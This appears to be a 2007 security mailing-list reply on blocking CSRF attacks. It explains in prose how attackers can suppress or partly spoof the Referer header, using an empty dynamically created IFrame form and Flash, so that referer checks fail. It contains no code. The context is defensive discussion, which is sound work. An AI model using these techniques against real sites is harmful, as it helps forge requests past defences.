Re: FW: blocking CSRF attacks

["Martin Johns" <martin.johns () gmail com>]

On 12/19/07, Paul Johnston <paj () pajhome org uk> wrote:
> In may be possible for an attacker to avoid the referer header being
> sent - if they use <meta http-equiv="refresh" ...> but I have not
> experimented with this, and it would only do this for GET requests.

There are several reliable methods to suppress the referrer which work
both for GET and POST.

E.g., in IE and FF it is sufficient to dynamically create an empty
IFrame and filling it with an HTML form which is targeted to the
victimised site. As the IFrame wasn't assigned an source URL, the
created HTTP request that is initiated by submitting the form does not
contain a referrer header.

It also is still possible to *somewhat* spoof the referrer in an CSRF
attack scenario using Flash:
https://www.flashsec.org/wiki/Arbitrary_HTTP_Requests

-- Martin

-- 
Martin Johns
http://www.informatik.uni-hamburg.de/SVS/personnel/martin/index.php

-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be 
considered a crucial phase in the development of any web application. What methodology should be followed? What tools 
can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------